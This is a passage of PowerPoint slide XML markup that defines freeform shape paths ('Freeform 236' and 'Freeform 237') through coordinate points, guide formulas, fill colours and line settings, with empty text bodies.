                      <a:pt x="73" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36103" name="Freeform 236"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3109" y="1764"/>
                <a:ext cx="77" cy="60"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 76 w 77"/>
                  <a:gd name="T1" fmla="*/ 2 h 60"/>
                  <a:gd name="T2" fmla="*/ 76 w 77"/>
                  <a:gd name="T3" fmla="*/ 6 h 60"/>
                  <a:gd name="T4" fmla="*/ 74 w 77"/>
                  <a:gd name="T5" fmla="*/ 7 h 60"/>
                  <a:gd name="T6" fmla="*/ 72 w 77"/>
                  <a:gd name="T7" fmla="*/ 8 h 60"/>
                  <a:gd name="T8" fmla="*/ 71 w 77"/>
                  <a:gd name="T9" fmla="*/ 13 h 60"/>
                  <a:gd name="T10" fmla="*/ 67 w 77"/>
                  <a:gd name="T11" fmla="*/ 18 h 60"/>
                  <a:gd name="T12" fmla="*/ 65 w 77"/>
                  <a:gd name="T13" fmla="*/ 22 h 60"/>
                  <a:gd name="T14" fmla="*/ 66 w 77"/>
                  <a:gd name="T15" fmla="*/ 30 h 60"/>
                  <a:gd name="T16" fmla="*/ 67 w 77"/>
                  <a:gd name="T17" fmla="*/ 35 h 60"/>
                  <a:gd name="T18" fmla="*/ 65 w 77"/>
                  <a:gd name="T19" fmla="*/ 39 h 60"/>
                  <a:gd name="T20" fmla="*/ 68 w 77"/>
                  <a:gd name="T21" fmla="*/ 43 h 60"/>
                  <a:gd name="T22" fmla="*/ 69 w 77"/>
                  <a:gd name="T23" fmla="*/ 45 h 60"/>
                  <a:gd name="T24" fmla="*/ 69 w 77"/>
                  <a:gd name="T25" fmla="*/ 49 h 60"/>
                  <a:gd name="T26" fmla="*/ 71 w 77"/>
                  <a:gd name="T27" fmla="*/ 50 h 60"/>
                  <a:gd name="T28" fmla="*/ 68 w 77"/>
                  <a:gd name="T29" fmla="*/ 51 h 60"/>
                  <a:gd name="T30" fmla="*/ 66 w 77"/>
                  <a:gd name="T31" fmla="*/ 54 h 60"/>
                  <a:gd name="T32" fmla="*/ 65 w 77"/>
                  <a:gd name="T33" fmla="*/ 55 h 60"/>
                  <a:gd name="T34" fmla="*/ 64 w 77"/>
                  <a:gd name="T35" fmla="*/ 58 h 60"/>
                  <a:gd name="T36" fmla="*/ 64 w 77"/>
                  <a:gd name="T37" fmla="*/ 60 h 60"/>
                  <a:gd name="T38" fmla="*/ 62 w 77"/>
                  <a:gd name="T39" fmla="*/ 60 h 60"/>
                  <a:gd name="T40" fmla="*/ 59 w 77"/>
                  <a:gd name="T41" fmla="*/ 59 h 60"/>
                  <a:gd name="T42" fmla="*/ 56 w 77"/>
                  <a:gd name="T43" fmla="*/ 57 h 60"/>
                  <a:gd name="T44" fmla="*/ 54 w 77"/>
                  <a:gd name="T45" fmla="*/ 58 h 60"/>
                  <a:gd name="T46" fmla="*/ 52 w 77"/>
                  <a:gd name="T47" fmla="*/ 60 h 60"/>
                  <a:gd name="T48" fmla="*/ 50 w 77"/>
                  <a:gd name="T49" fmla="*/ 59 h 60"/>
                  <a:gd name="T50" fmla="*/ 48 w 77"/>
                  <a:gd name="T51" fmla="*/ 59 h 60"/>
                  <a:gd name="T52" fmla="*/ 46 w 77"/>
                  <a:gd name="T53" fmla="*/ 55 h 60"/>
                  <a:gd name="T54" fmla="*/ 43 w 77"/>
                  <a:gd name="T55" fmla="*/ 53 h 60"/>
                  <a:gd name="T56" fmla="*/ 41 w 77"/>
                  <a:gd name="T57" fmla="*/ 51 h 60"/>
                  <a:gd name="T58" fmla="*/ 38 w 77"/>
                  <a:gd name="T59" fmla="*/ 49 h 60"/>
                  <a:gd name="T60" fmla="*/ 36 w 77"/>
                  <a:gd name="T61" fmla="*/ 49 h 60"/>
                  <a:gd name="T62" fmla="*/ 33 w 77"/>
                  <a:gd name="T63" fmla="*/ 47 h 60"/>
                  <a:gd name="T64" fmla="*/ 31 w 77"/>
                  <a:gd name="T65" fmla="*/ 44 h 60"/>
                  <a:gd name="T66" fmla="*/ 30 w 77"/>
                  <a:gd name="T67" fmla="*/ 46 h 60"/>
                  <a:gd name="T68" fmla="*/ 29 w 77"/>
                  <a:gd name="T69" fmla="*/ 45 h 60"/>
                  <a:gd name="T70" fmla="*/ 28 w 77"/>
                  <a:gd name="T71" fmla="*/ 44 h 60"/>
                  <a:gd name="T72" fmla="*/ 25 w 77"/>
                  <a:gd name="T73" fmla="*/ 46 h 60"/>
                  <a:gd name="T74" fmla="*/ 23 w 77"/>
                  <a:gd name="T75" fmla="*/ 47 h 60"/>
                  <a:gd name="T76" fmla="*/ 20 w 77"/>
                  <a:gd name="T77" fmla="*/ 48 h 60"/>
                  <a:gd name="T78" fmla="*/ 17 w 77"/>
                  <a:gd name="T79" fmla="*/ 50 h 60"/>
                  <a:gd name="T80" fmla="*/ 18 w 77"/>
                  <a:gd name="T81" fmla="*/ 48 h 60"/>
                  <a:gd name="T82" fmla="*/ 19 w 77"/>
                  <a:gd name="T83" fmla="*/ 40 h 60"/>
                  <a:gd name="T84" fmla="*/ 12 w 77"/>
                  <a:gd name="T85" fmla="*/ 43 h 60"/>
                  <a:gd name="T86" fmla="*/ 6 w 77"/>
                  <a:gd name="T87" fmla="*/ 39 h 60"/>
                  <a:gd name="T88" fmla="*/ 3 w 77"/>
                  <a:gd name="T89" fmla="*/ 28 h 60"/>
                  <a:gd name="T90" fmla="*/ 2 w 77"/>
                  <a:gd name="T91" fmla="*/ 20 h 60"/>
                  <a:gd name="T92" fmla="*/ 2 w 77"/>
                  <a:gd name="T93" fmla="*/ 15 h 60"/>
                  <a:gd name="T94" fmla="*/ 4 w 77"/>
                  <a:gd name="T95" fmla="*/ 11 h 60"/>
                  <a:gd name="T96" fmla="*/ 11 w 77"/>
                  <a:gd name="T97" fmla="*/ 8 h 60"/>
                  <a:gd name="T98" fmla="*/ 16 w 77"/>
                  <a:gd name="T99" fmla="*/ 4 h 60"/>
                  <a:gd name="T100" fmla="*/ 20 w 77"/>
                  <a:gd name="T101" fmla="*/ 4 h 60"/>
                  <a:gd name="T102" fmla="*/ 23 w 77"/>
                  <a:gd name="T103" fmla="*/ 2 h 60"/>
                  <a:gd name="T104" fmla="*/ 34 w 77"/>
                  <a:gd name="T105" fmla="*/ 0 h 60"/>
                  <a:gd name="T106" fmla="*/ 38 w 77"/>
                  <a:gd name="T107" fmla="*/ 1 h 60"/>
                  <a:gd name="T108" fmla="*/ 56 w 77"/>
                  <a:gd name="T109" fmla="*/ 4 h 60"/>
                  <a:gd name="T110" fmla="*/ 63 w 77"/>
                  <a:gd name="T111" fmla="*/ 5 h 60"/>
                  <a:gd name="T112" fmla="*/ 73 w 77"/>
                  <a:gd name="T113" fmla="*/ 5 h 60"/>
                  <a:gd name="T114" fmla="*/ 74 w 77"/>
                  <a:gd name="T115" fmla="*/ 1 h 6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77"/>
                  <a:gd name="T175" fmla="*/ 0 h 60"/>
                  <a:gd name="T176" fmla="*/ 77 w 77"/>
                  <a:gd name="T177" fmla="*/ 60 h 6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77" h="60">
                    <a:moveTo>
                      <a:pt x="74" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="76" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36104" name="Freeform 237"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3071" y="1808"/>
                <a:ext cx="115" cy="70"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 105 w 115"/>
                  <a:gd name="T1" fmla="*/ 18 h 70"/>
                  <a:gd name="T2" fmla="*/ 108 w 115"/>
                  <a:gd name="T3" fmla="*/ 21 h 70"/>
                  <a:gd name="T4" fmla="*/ 110 w 115"/>
                  <a:gd name="T5" fmla="*/ 24 h 70"/>
                  <a:gd name="T6" fmla="*/ 109 w 115"/>
                  <a:gd name="T7" fmla="*/ 28 h 70"/>
                  <a:gd name="T8" fmla="*/ 108 w 115"/>
                  <a:gd name="T9" fmla="*/ 29 h 70"/>
                  <a:gd name="T10" fmla="*/ 107 w 115"/>
                  <a:gd name="T11" fmla="*/ 34 h 70"/>
                  <a:gd name="T12" fmla="*/ 108 w 115"/>
                  <a:gd name="T13" fmla="*/ 35 h 70"/>
                  <a:gd name="T14" fmla="*/ 110 w 115"/>
                  <a:gd name="T15" fmla="*/ 36 h 70"/>
                  <a:gd name="T16" fmla="*/ 110 w 115"/>
                  <a:gd name="T17" fmla="*/ 39 h 70"/>
                  <a:gd name="T18" fmla="*/ 112 w 115"/>
                  <a:gd name="T19" fmla="*/ 43 h 70"/>
                  <a:gd name="T20" fmla="*/ 114 w 115"/>
                  <a:gd name="T21" fmla="*/ 46 h 70"/>
                  <a:gd name="T22" fmla="*/ 115 w 115"/>
                  <a:gd name="T23" fmla="*/ 53 h 70"/>
                  <a:gd name="T24" fmla="*/ 114 w 115"/>
                  <a:gd name="T25" fmla="*/ 56 h 70"/>
                  <a:gd name="T26" fmla="*/ 110 w 115"/>
                  <a:gd name="T27" fmla="*/ 59 h 70"/>
                  <a:gd name="T28" fmla="*/ 107 w 115"/>
                  <a:gd name="T29" fmla="*/ 62 h 70"/>
                  <a:gd name="T30" fmla="*/ 104 w 115"/>
                  <a:gd name="T31" fmla="*/ 67 h 70"/>
                  <a:gd name="T32" fmla="*/ 99 w 115"/>
                  <a:gd name="T33" fmla="*/ 65 h 70"/>
                  <a:gd name="T34" fmla="*/ 94 w 115"/>
                  <a:gd name="T35" fmla="*/ 68 h 70"/>
                  <a:gd name="T36" fmla="*/ 91 w 115"/>
                  <a:gd name="T37" fmla="*/ 69 h 70"/>
                  <a:gd name="T38" fmla="*/ 85 w 115"/>
                  <a:gd name="T39" fmla="*/ 68 h 70"/>
                  <a:gd name="T40" fmla="*/ 81 w 115"/>
                  <a:gd name="T41" fmla="*/ 62 h 70"/>
                  <a:gd name="T42" fmla="*/ 72 w 115"/>
                  <a:gd name="T43" fmla="*/ 56 h 70"/>
                  <a:gd name="T44" fmla="*/ 64 w 115"/>
                  <a:gd name="T45" fmla="*/ 52 h 70"/>
                  <a:gd name="T46" fmla="*/ 61 w 115"/>
                  <a:gd name="T47" fmla="*/ 49 h 70"/>
                  <a:gd name="T48" fmla="*/ 54 w 115"/>
                  <a:gd name="T49" fmla="*/ 52 h 70"/>
                  <a:gd name="T50" fmla="*/ 48 w 115"/>
                  <a:gd name="T51" fmla="*/ 51 h 70"/>
                  <a:gd name="T52" fmla="*/ 39 w 115"/>
                  <a:gd name="T53" fmla="*/ 50 h 70"/>
                  <a:gd name="T54" fmla="*/ 34 w 115"/>
                  <a:gd name="T55" fmla="*/ 51 h 70"/>
                  <a:gd name="T56" fmla="*/ 31 w 115"/>
                  <a:gd name="T57" fmla="*/ 49 h 70"/>
                  <a:gd name="T58" fmla="*/ 22 w 115"/>
                  <a:gd name="T59" fmla="*/ 49 h 70"/>
                  <a:gd name="T60" fmla="*/ 10 w 115"/>
